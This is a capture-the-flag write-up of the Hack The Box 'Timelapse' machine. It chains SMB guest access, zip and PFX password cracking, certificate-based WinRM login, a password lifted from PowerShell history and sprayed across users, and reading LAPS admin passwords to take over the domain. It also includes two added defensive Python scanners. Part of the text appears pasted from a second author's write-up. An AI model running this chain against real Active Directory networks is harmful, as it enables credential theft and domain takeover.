htb-timelaps
Nmap scan report for timelapse.htb (10.10.11.152)
Host is up (0.024s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-06-04 15:41:22Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
5986/tcp open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_  http/1.1
|_ssl-date: 2025-06-04T15:42:43+00:00; +7h59m59s from scanner time.
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-06-04T15:42:03
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.75 seconds
The Nmap scan already revealed the name of the AD domain; since the LDAP service is open, we can also confirm it with the following command.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ ldapsearch -x -H ldap://10.10.11.152 -s base | grep defaultNamingContext
defaultNamingContext: DC=timelapse,DC=htb
We add the corresponding domain name to our /etc/hosts file.
Since the Kerberos port (88) is open, we enumerate AD users with the Kerbrute tool. At this point it confirms two valid usernames: "Administrator" and "Guest".
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ ./kerbrute_linux_amd64 userenum --dc 10.10.11.152 -d timelapse.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Version: v1.0.3 (9dad6e1) - 06/03/25 - Ronnie Flathers @ropnop

2025/06/03 11:22:05 >  Using KDC(s):
2025/06/03 11:22:05 >      10.10.11.152:88

2025/06/03 11:22:08 >  [+] VALID USERNAME:     guest@timelapse.htb
2025/06/03 11:22:15 >  [+] VALID USERNAME:     administrator@timelapse.htb
As we have seen, the SMB service is exposed, so we check which resources are shared via Samba.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ smbclient -L 10.10.11.152 -N 2>/dev/null

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shares          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
With netexec we check whether the user "guest" can authenticate without a password and what permissions it has on the shared resources. We find it has read permissions on the "Shares" and "IPC$" shares.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ netexec smb 10.10.11.152 -u guest -p "" --shares
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\guest:
SMB         10.10.11.152    445    DC01             [*] Enumerated shares
SMB         10.10.11.152    445    DC01             Share           Permissions     Remark
SMB         10.10.11.152    445    DC01             -----           -----------     ------
SMB         10.10.11.152    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.152    445    DC01             C$                              Default share
SMB         10.10.11.152    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.152    445    DC01             NETLOGON                        Logon server share
SMB         10.10.11.152    445    DC01             Shares          READ
SMB         10.10.11.152    445    DC01             SYSVOL                          Logon server share
Once access has been confirmed, we connect to the "Shares" share as the user "guest", list the directories looking for files, and download them to our Kali machine to analyze.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ smbclient //10.10.11.152/Shares -U timelapse.htb/guest
Password for [TIMELAPSE.HTB\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 17:39:15 2021
  ..                                  D        0  Mon Oct 25 17:39:15 2021
  Dev                                 D        0  Mon Oct 25 21:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 17:48:42 2021

                6367231 blocks of size 4096. 1245104 blocks available
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 21:40:06 2021
  ..                                  D        0  Mon Oct 25 21:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 17:46:42 2021

                6367231 blocks of size 4096. 1244807 blocks available
smb: \Dev\> mget *
Get file winrm_backup.zip? y
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (5.4 KiloBytes/sec) (average 5.4 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> cd Helpdesk
smb: \Helpdesk\> mget *
Get file LAPS.x64.msi? y
getting file \Helpdesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (541.9 KiloBytes/sec) (average 440.6 KiloBytes/sec)
Get file LAPS_Datasheet.docx? y
getting file \Helpdesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (99.8 KiloBytes/sec) (average 341.3 KiloBytes/sec)
Get file LAPS_OperationsGuide.docx? y
getting file \Helpdesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (599.9 KiloBytes/sec) (average 400.6 KiloBytes/sec)
Get file LAPS_TechnicalSpecification.docx? y
getting file \Helpdesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (82.1 KiloBytes/sec) (average 349.7 KiloBytes/sec)
smb: \Helpdesk\>
With the fcrackzip tool we try to crack the password of the .zip we downloaded from the SMB share. Passing it a password dictionary, we confirm that it recovers the password.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip

PASSWORD FOUND!!!!: pw == supremelegacy
We decompress the .zip with the password we just cracked. The output is a PFX file, which contains an SSL certificate and its private key in PKCS#12 format. PFX files can be used by WinRM to log in without a password (certificate-based authentication).
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
  inflating: legacyy_dev_auth.pfx
Obtain Keys
Crack pfx Password
These are the openssl commands to extract the private key and certificate (public key) from a .pfx file. Unfortunately, this one requires a password:
puck@hacky$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
pfx2john.py will generate a hash for it (piped into tee to both save it to a file and examine the output):
puck@hacky$ pfx2john.py legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash
legacyy_dev_auth.pfx:$pfxng$1$20$2000$20$eb755568327396de179c4a<snip>0ae18a$30cc74f0e893:::::legacyy_dev_auth.pfx
This time it takes john about half a minute to find the password “thuglegacy”:
puck@hacky$ john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:24 DONE (2025-06-01 16:24) 0.04115g/s 132993p/s 132993c/s 132993C/s thuglife03282006..thscndsp1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Extract Keys
With the password, I can extract the key and certificate. When extracting the key, it asks for the password (I’ll provide “thuglegacy”), and then a password for the output .pem file (anything I want, must be at least four characters):
puck@hacky$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
I’ll decrypt the key using the password I set above so I don’t have to remember it:
puck@hacky$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key
And dump the certificate:
puck@hacky$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:
Now both files exist:
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ ls -la legacyy_dev_auth.*
-rw------- 1 bolke bolke 1232 Jun  3 11:44 legacyy_dev_auth.crt
-rw------- 1 bolke bolke 1704 Jun  3 11:43 legacyy_dev_auth.key
-rw------- 1 bolke bolke 2134 Jun  3 11:43 legacyy_dev_auth.key-enc
-rwxr-xr-x 1 bolke bolke 2555 Oct 25  2021 legacyy_dev_auth.pfx
-rw-rw-r-- 1 bolke bolke 5077 Jun  3 11:35 legacyy_dev_auth.pfx.hash
Evil-WinRM
evil-winrm is the best tool for connecting to WinRM from a Linux host. Looking at the usage shows how I’ll use these keys to connect:
puck@hacky$ evil-winrm -h
Evil-WinRM shell v3.3
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
--spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP)
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-n, --no-colors Disable colors
-N, --no-rpath-completion Disable remote path completion
-l, --log Log the WinRM session
-h, --help Display this help message
I’ll use the following:
-S – Enable SSL, because I’m connecting to 5986
-c legacyy_dev_auth.crt – provide the public key certificate
-k legacyy_dev_auth.key – provide the private key
-i timelapse.htb – host to connect to
It works to get a shell as legacyy:
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>
legacyy has user.txt
We check the PowerShell history of the “legacyy” user, the account we gained access with. In it a series of script commands appears in which the password of the user “svc_deploy” is stored in plain text.
*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\Users\legacyy\Documents>
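The history above is exactly what a defender should be sweeping user profiles for. The following scanner is an added example (not part of the original writeup): it runs over ConsoleHost_history.txt content and flags lines that carry a secret in plain text, reporting a masked value rather than the secret itself. The sample history and the placeholder password are constructed.

```python
"""Scan PSReadline history for plaintext-credential patterns (added example,
not from the original post). A defender can run it over ConsoleHost_history.txt
files collected from user profiles to find secrets typed at the prompt, like
the svc_deploy password recovered above."""
import re

# Constructed sample mirroring the history recovered on the box; the real
# password is replaced by a placeholder.
SAMPLE_HISTORY = """whoami
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'PLACEHOLDER-PASSWORD' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
"""

# (rule name, regex); group 1 captures the secret so it can be masked.
RULES = [
    ("plaintext SecureString",
     re.compile(r"ConvertTo-SecureString\s+['\"]([^'\"]+)['\"].*-AsPlainText", re.I)),
    ("PSCredential with literal password",
     re.compile(r"PSCredential\s*\(\s*['\"][^'\"]+['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)),
    ("net user ... /add with password",
     re.compile(r"net\s+user\s+\S+\s+(\S+)\s+/add", re.I)),
]

def mask(secret: str) -> str:
    """Keep the first two characters so a finding can be matched to a vault
    entry without writing the whole secret into a report."""
    return secret[:2] + "*" * (len(secret) - 2)

def scan_history(text: str) -> list[dict]:
    """One finding per matching line: line number, rule name, masked secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "rule": name,
                                 "masked": mask(m.group(1))})
    return findings

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['rule']} -> {f['masked']}")
```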
The password belongs to the user “svc_deploy”, but we also check whether it works for other AD users. To do this we export all AD users to a text file and download it to our local machine.
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-ADUser -Filter * | Select-Object -ExpandProperty Name > usersAD.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents> type usersAD.txt
Administrator
Guest
krbtgt
TheCyberGeek
Payl0ad
Legacyy
Sinfulz
Babywyrm
svc_deploy
TRX
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ netexec winrm 10.10.11.152 -u usersAD.txt -p 'E3R$Q62^12p7PLlC%KWaxuaV'
WINRM-SSL   10.10.11.152    5986   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:timelapse.htb)
WINRM-SSL   10.10.11.152    5986   DC01             [-] timelapse.htb\Administrator:E3R$Q62^12p7PLlC%KWaxuaV
WINRM-SSL   10.10.11.152    5986   DC01             [-] timelapse.htb\Guest:E3R$Q62^12p7PLlC%KWaxuaV
WINRM-SSL   10.10.11.152    5986   DC01             [-] timelapse.htb\krbtgt:E3R$Q62^12p7PLlC%KWaxuaV
WINRM-SSL   10.10.11.152    5986   DC01             [-] timelapse.htb\TheCyberGeek:E3R$Q62^12p7PLlC%KWaxuaV
WINRM-SSL   10.10.11.152    5986   DC01             [-] timelapse.htb\Payl0ad:E3R$Q62^12p7PLlC%KWaxuaV
WINRM-SSL   10.10.11.152    5986   DC01             [-] timelapse.htb\Legacyy:E3R$Q62^12p7PLlC%KWaxuaV
WINRM-SSL   10.10.11.152    5986   DC01             [-] timelapse.htb\Sinfulz:E3R$Q62^12p7PLlC%KWaxuaV
WINRM-SSL   10.10.11.152    5986   DC01             [-] timelapse.htb\Babywyrm:E3R$Q62^12p7PLlC%KWaxuaV
WINRM-SSL   10.10.11.152    5986   DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV (Pwn3d!)
We connect again to WinRM with the user and credentials found, and verify that we gain access as the user “svc_deploy”.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
net user svc_deploy shows that we are a member of the LAPS_Readers group. The “Local Administrator Password Solution” (LAPS) is used to manage the local account passwords of Active Directory computers.
We list the local Administrator passwords of all AD computers, taking advantage of our LAPS read rights to extract the credentials. We find one password (for DC01).
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -Filter * -Property ms-MCS-AdmPwd | Select-Object Name, ms-MCS-AdmPwd

Name  ms-MCS-AdmPwd
----  -------------
DC01  !BM0/5NB1.$,iUGG5vQYdY4u
DB01
WEB01
DEV01
We can also use the ldapsearch tool with the following command to achieve the same result as the previous step.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ ldapsearch -x -H ldap://10.10.11.152 -D 'svc_deploy' -w 'E3R$Q62^12p7PLlC%KWaxuaV' -b 'dc=timelapse,dc=htb' '(objectClass=computer)' ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <dc=timelapse,dc=htb> with scope subtree
# filter: (objectClass=computer)
# requesting: ms-MCS-AdmPwd
#

# DC01, Domain Controllers, timelapse.htb
dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: !BM0/5NB1.$,iUGG5vQYdY4u

# DB01, Database, Servers, timelapse.htb
dn: CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb

# WEB01, Web, Servers, timelapse.htb
dn: CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb

# DEV01, Dev, Servers, timelapse.htb
dn: CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb

# search reference
ref: ldap://ForestDnsZones.timelapse.htb/DC=ForestDnsZones,DC=timelapse,DC=htb

# search reference
ref: ldap://DomainDnsZones.timelapse.htb/DC=DomainDnsZones,DC=timelapse,DC=htb

# search reference
ref: ldap://timelapse.htb/CN=Configuration,DC=timelapse,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 8
# numEntries: 4
# numReferences: 3
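The same ldapsearch query doubles as a LAPS delegation check: run it as an ordinary account and any computer whose ms-Mcs-AdmPwd value comes back is one whose local Administrator password that account can read. The parser below is an added example (not part of the original writeup) that turns such an LDIF dump into a per-computer exposure report without echoing the password; the sample LDIF is constructed to match the shape of the output above, with a placeholder in place of the real value.

```python
"""Audit ms-Mcs-AdmPwd exposure from an ldapsearch LDIF dump (added example,
not from the original post). Feed it the output of the ldapsearch above run as
a non-admin account: every computer whose ms-Mcs-AdmPwd comes back is one whose
local Administrator password that account can read."""

# Constructed sample with the LDIF shape returned on the box; the real
# password value is replaced by a placeholder.
SAMPLE_LDIF = """# DC01, Domain Controllers, timelapse.htb
dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: PLACEHOLDER-PASSWORD

# DB01, Database, Servers, timelapse.htb
dn: CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb

ref: ldap://ForestDnsZones.timelapse.htb/DC=ForestDnsZones,DC=timelapse,DC=htb

search: 2
result: 0 Success
"""

def parse_ldif_entries(text: str) -> list[dict]:
    """Split LDIF into blank-line separated entries and keep those with a dn.
    Attribute names are lower-cased: LDAP names are case-insensitive, and the
    server answered ms-Mcs-AdmPwd to a request for ms-MCS-AdmPwd."""
    entries, current, last = [], {}, None
    for line in text.splitlines():
        if line.startswith("#"):                # LDIF comment
            continue
        if not line.strip():                    # entry separator
            if "dn" in current:
                entries.append(current)
            current, last = {}, None
            continue
        if line.startswith(" ") and last:       # folded continuation line
            current[last] += line[1:]
            continue
        key, _, value = line.partition(":")
        last = key.strip().lower()
        current[last] = value.strip()
    if "dn" in current:
        entries.append(current)
    return entries

def laps_exposure(text: str) -> dict:
    """Computer name -> True when its LAPS password attribute was returned."""
    report = {}
    for e in parse_ldif_entries(text):
        rdn = e["dn"].split(",", 1)[0]
        if rdn.upper().startswith("CN="):
            report[rdn[3:]] = "ms-mcs-admpwd" in e
    return report
```

Any True entry for an account that is not supposed to hold LAPS read rights is an ACL finding to fix on the OU, not on the computer object.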
We connect to the machine as the user Administrator with the credentials found, and see that we have gained access as Administrator.
To locate the “root.txt” flag we run the following command, which searches the “Desktop” of every user on the machine, since the flag is on another user’s desktop.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ evil-winrm -i 10.10.11.152 -u Administrator -p '!BM0/5NB1.$,iUGG5vQYdY4u' -S

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path "C:\Users" -Recurse -Filter "root.txt" -ErrorAction SilentlyContinue | Where-Object { $_.Directory -like "*\Desktop" }

    Directory: C:\Users\TRX\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          6/4/2025   7:33 AM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Documents>
That was fun.